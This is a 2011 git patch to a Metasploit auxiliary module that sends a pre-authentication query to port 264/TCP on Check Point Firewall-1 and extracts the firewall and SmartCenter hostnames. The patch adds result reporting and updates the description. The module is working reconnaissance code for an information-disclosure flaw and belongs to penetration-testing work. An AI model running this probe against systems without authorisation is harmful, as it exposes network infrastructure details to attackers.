From 99556da7efab83aec081325bf0641a016b1687af Mon Sep 17 00:00:00 2001
From: Tod Beardsley <todb@metasploit.com>
Date: Tue, 20 Dec 2011 15:44:05 -0600
Subject: [PATCH] Adds reporting to Patrick's Checkpoint module

Also refers to port 264/TCP as the SecuRemote service instead of the
Topology service (I believe this is correct)

Reporting is initially conservative -- if we don't get something for
fw_hostname, then don't bother reporting at all; assume we're
mis-identifying the target.
---
 .../auxiliary/gather/checkpoint_hostname.rb   | 48 ++++++++++++++-----
 1 file changed, 35 insertions(+), 13 deletions(-)

diff --git a/modules/auxiliary/gather/checkpoint_hostname.rb b/modules/auxiliary/gather/checkpoint_hostname.rb
index f3b1e078ef..03d98024b3 100644
--- a/modules/auxiliary/gather/checkpoint_hostname.rb
+++ b/modules/auxiliary/gather/checkpoint_hostname.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -9,28 +5,26 @@
 # http://metasploit.com/framework/
 ##
 
-
 require 'msf/core'
 
-
 class Metasploit3 < Msf::Auxiliary
 
 	include Msf::Exploit::Remote::Tcp
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'CheckPoint Firewall-1 Topology Service Hostname Disclosure',
+			'Name'           => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
 			'Description'    => %q{
-				This module sends a query to the TCP port 264 on CheckPoint
+				This module sends a query to the port 264/TCP on CheckPoint Firewall-1
 				firewalls to obtain the firewall name and management station
-				(such as SmartCenter) name.
+				(such as SmartCenter) name via a pre-authentication topology request.
 			},
 			'Author'         => [ 'patrick' ],
-			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					# patrickw - None? Stumbled across, probably an old bug/feature but unsure.
 					[ 'URL', 'http://www.osisecurity.com.au/advisories/' ],
+					[ 'URL', 'http://www.securiteam.com/securitynews/5HP0D2A4UC.html' ] # Related?
 				]
 		))
 
@@ -45,7 +39,10 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
-		print_status("Attempting to contact Checkpoint FW1 Topology service...")
+		print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
+		fw_hostname = nil
+		sc_hostname = nil
+
 		connect
 
 		sock.put("\x51\x00\x00\x00")
@@ -56,14 +53,39 @@ class Metasploit3 < Msf::Auxiliary
 			sock.put("\x00\x00\x00\x0bsecuremote\x00")
 			res = sock.get_once
 			if (res =~ /CN\=(.+),O\=(.+)\./i)
-				print_good("Firewall Host: #{$1}")
-				print_good("SmartCenter Host: #{$2}")
+				fw_hostname = $1
+				sc_hostname = $2
+				print_good("Firewall Host: #{fw_hostname}")
+				print_good("SmartCenter Host: #{sc_hostname}")
 			end
 		else
 			print_error("Unexpected response:\r\n#{res}")
 		end
 
+		report_info(fw_hostname,sc_hostname)
+
 		disconnect
 	end
 
+	# Only trust that it's real if we have a hostname. If you get a funny
+	# response, it might not be what we think it is.
+	def report_info(fw_hostname,sc_hostname)
+		return unless fw_hostname
+		host_info = {
+			:host => datastore['RHOST'],
+			:os_name => "Checkpoint Firewall-1",
+			:purpose => "firewall"
+		}
+		host_info[:name] = fw_hostname
+		host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
+		report_host(host_info)
+		svc_info = {
+			:host => datastore['RHOST'],
+			:port => datastore['RPORT'],
+			:proto => "tcp",
+			:name => "securemote"
+		}
+		report_service(svc_info)
+	end
+
 end